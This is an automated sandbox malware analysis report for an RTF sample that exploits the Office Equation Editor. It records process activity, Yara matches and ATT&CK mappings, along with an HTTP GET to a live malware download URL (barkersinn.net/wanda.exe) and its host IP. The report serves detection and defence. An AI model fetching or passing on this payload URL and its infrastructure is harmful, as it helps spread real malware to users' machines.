Create Interactive Tour

Windows Analysis Report
SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf
Analysis ID:784882
MD5:815bb902aa778ff788f22db14b0053f3
SHA1:fa03f2a12a3dfcb0661fc15d2bc7944f82b75fce
SHA256:098cb30970dd2fc4982ffb4fad8e80ec615e677cf2756c5256c360b2c9f7f199
Tags:rtf
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Office equation editor establishes network connection
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Office Equation Editor has been started
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w7x64
  • WINWORD.EXE (PID: 2692 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1244 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • EQNEDT32.EXE (PID: 1112 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtfSUSP_INDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.ditekSHen
  • 0x61:$obj2: \objdata
  • 0x237:$obj3: \objupdate
SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x61:$obj2: \objdata
  • 0x237:$obj3: \objupdate

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 209.59.191.114, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1244, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49181
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtfReversingLabs: Detection: 20%
Source: SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtfVirustotal: Detection: 31%Perma Link
Source: http://barkersinn.net/wanda.exeAvira URL Cloud: Label: malware
Source: http://barkersinn.net/wanda.exeVirustotal: Detection: 6%Perma Link

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 209.59.191.114 Port: 80Jump to behavior
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 209.59.191.114:80
Source: global trafficTCP traffic: 209.59.191.114:80 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 209.59.191.114:80
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 209.59.191.114:80
Source: global trafficTCP traffic: 209.59.191.114:80 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 209.59.191.114:80 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 209.59.191.114:80
Source: global trafficTCP traffic: 209.59.191.114:80 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 209.59.191.114:80
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 209.59.191.114:80
Source: global trafficDNS query: name: barkersinn.net
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 209.59.191.114:80
Source: global trafficHTTP traffic detected: GET /wanda.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: barkersinn.netConnection: Keep-Alive
Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: EQNEDT32.EXE, 00000002.00000002.919645407.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.919645407.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 16 Jan 2023 06:35:38 GMTServer: ApacheContent-Length: 318Keep-Alive: timeout=2, max=500Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: EQNEDT32.EXEString found in binary or memory: http://barkersinn.net/wanda.exe
Source: EQNEDT32.EXE, 00000002.00000002.919645407.0000000000564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barkersinn.net/wanda.exeC
Source: EQNEDT32.EXE, 00000002.00000002.919645407.0000000000564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barkersinn.net/wanda.exeH
Source: EQNEDT32.EXE, 00000002.00000002.919645407.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://barkersinn.net/wanda.exej
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B988D5F7-0006-4A79-ADCC-C0412EF19253}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: barkersinn.net
Source: global trafficHTTP traffic detected: GET /wanda.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: barkersinn.netConnection: Keep-Alive

System Summary

barindex
Source: SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf, type: SAMPLEMatched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
Source: SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtfReversingLabs: Detection: 20%
Source: SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtfVirustotal: Detection: 31%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtfJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR73B8.tmpJump to behavior
Source: classification engineClassification label: mal84.expl.winRTF@3/4@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0057F643 push ss; iretd 2_2_0057F6EB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0057B372 push edx; retf 2_2_0057B373
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0057F76E push ebp; iretd 2_2_0057F804
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00582909 push ss; iretd 2_2_0058290B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0057F7E0 push ebp; iretd 2_2_0057F804
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00579990 push eax; iretd 2_2_00579991
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0057C386 pushad ; ret 2_2_0057C38D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005799A4 push edi; iretd 2_2_005799A9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005748A0 pushad ; ret 2_2_005748A1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1404Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 260Thread sleep time: -60000s >= -30000sJump to behavior
Source: EQNEDT32.EXE, 00000002.00000003.919377167.00000000005D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts13
Exploitation for Client Execution
Path Interception1
Process Injection
1
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium3
Non-Application Layer Protocol
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth13
Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
Ingress Tool Transfer
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Obfuscated Files or Information
NTDS3
System Information Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 784882 Sample: SecuriteInfo.com.Exploit.RT... Startdate: 16/01/2023 Architecture: WINDOWS Score: 84 15 Multi AV Scanner detection for domain / URL 2->15 17 Malicious sample detected (through community Yara rule) 2->17 19 Antivirus detection for URL or domain 2->19 21 2 other signatures 2->21 5 EQNEDT32.EXE 10 2->5         started        9 WINWORD.EXE 336 22 2->9         started        11 EQNEDT32.EXE 2->11         started        process3 dnsIp4 13 barkersinn.net 209.59.191.114, 49181, 80 LIQUIDWEBUS United States 5->13 23 Office equation editor establishes network connection 5->23 signatures5

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf21%ReversingLabsDocument-RTF.Exploit.Heuristic
SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf32%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://barkersinn.net/wanda.exeH0%Avira URL Cloudsafe
http://barkersinn.net/wanda.exeC0%Avira URL Cloudsafe
http://barkersinn.net/wanda.exe7%VirustotalBrowse
http://barkersinn.net/wanda.exej0%Avira URL Cloudsafe
http://barkersinn.net/wanda.exe100%Avira URL Cloudmalware

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
barkersinn.net
209.59.191.114
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://barkersinn.net/wanda.exetrue
    • 7%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://barkersinn.net/wanda.exeHEQNEDT32.EXE, 00000002.00000002.919645407.0000000000564000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://barkersinn.net/wanda.exeCEQNEDT32.EXE, 00000002.00000002.919645407.0000000000564000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://barkersinn.net/wanda.exejEQNEDT32.EXE, 00000002.00000002.919645407.000000000056F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    209.59.191.114
    barkersinn.netUnited States
    32244LIQUIDWEBUStrue
    Joe Sandbox Version:36.0.0 Rainbow Opal
    Analysis ID:784882
    Start date and time:2023-01-16 07:34:32 +01:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 5m 49s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.14061.17119.rtf
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:8
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal84.expl.winRTF@3/4@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .rtf
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Active ActiveX Object
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
    • Execution Graph export aborted for target EQNEDT32.EXE, PID 1244 because there are no executed function
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    TimeTypeDescription
    07:35:21API Interceptor316x Sleep call for process: EQNEDT32.EXE modified
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    209.59.191.114SecuriteInfo.com.Exploit.CVE-2018-0798.4.12475.25337.rtfGet hashmaliciousBrowse
    • barkersinn.net/wanda.exe
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    barkersinn.netSecuriteInfo.com.Exploit.CVE-2018-0798.4.12475.25337.rtfGet hashmaliciousBrowse
    • 209.59.191.114
    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    LIQUIDWEBUSSecuriteInfo.com.Exploit.CVE-2018-0798.4.12475.25337.rtfGet hashmaliciousBrowse
    • 209.59.191.114
    https://oakforestbaptistchurch.org/linkedinnoticeurg/LinkedIn/sojian.php?email=info.austria@thermofisher.comGet hashmaliciousBrowse
    • 50.28.1.43
    LHGaUDtqPo.elfGet hashmaliciousBrowse
    • 69.167.163.96
    Sales Invoices.exeGet hashmaliciousBrowse
    • 67.225.192.146
    http://yellowdoorenergy.comGet hashmaliciousBrowse
    • 67.227.249.141
    http://exec200systems.comGet hashmaliciousBrowse
    • 67.225.141.109
    SecuriteInfo.com.W32.GenKryptik.FYXW.tr.26324.25853.exeGet hashmaliciousBrowse
    • 67.225.140.63
    shef2.2.exeGet hashmaliciousBrowse
    • 69.16.200.142
    shedo.exeGet hashmaliciousBrowse
    • 69.16.200.142
    Drql8qB4Ra.elfGet hashmaliciousBrowse
    • 50.28.59.195
    ORDER.EXE.exeGet hashmaliciousBrowse
    • 69.16.212.181
    Neue_Ordnung_20220712.exeGet hashmaliciousBrowse
    • 69.16.212.181
    http://tinybit.cc/8c545000Get hashmaliciousBrowse
    • 50.28.32.8
    https://mntmnt.com/3S6iCGet hashmaliciousBrowse
    • 69.167.167.169
    TKhtsbYj49.exeGet hashmaliciousBrowse
    • 50.28.51.143
    TKhtsbYj49.exeGet hashmaliciousBrowse
    • 50.28.51.143
    Adobe_Scan.htmlGet hashmaliciousBrowse
    • 67.225.146.248
    Outstanding SOA.exeGet hashmaliciousBrowse
    • 69.16.212.181
    eWASheoagJ.exeGet hashmaliciousBrowse
    • 50.28.51.143
    Swift confirmation copy.exeGet hashmaliciousBrowse
    • 67.225.192.146
    No context
    No context
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:46:01 2022, mtime=Tue Mar 8 15:46:01 2022, atime=Mon Jan 16 14:35:20 2023, length=3409, window=hide
    Category:dropped
    Size (bytes):1239
    Entropy (8bit):4.58520406825598
    Encrypted:false
    SSDEEP:24:8wY/XTHEY2mk0THC76IJeivzqHC76aDv3qGniu7D:8r/XTkZT0THCrJqHCaGi0D
    MD5:112613A430A58963A8C9B2BB8E464FB6
    SHA1:A71824553A1AD54C2342956C9532CA59D7B2FFA4
    SHA-256:0BA77945436A3837E52FB5310C244F3AF5D74D6A156CF845278267EFB9749A5A
    SHA-512:6C44E41703FA199C160A9ABF7C2E5E927C53D0F43A31BCC1CB22AFB5375BA343CD2305920E8C4E106B45C33F42DA747CFDBA1C5278A0FCDB84D03914FF38B5C6
    Malicious:false
    Reputation:low
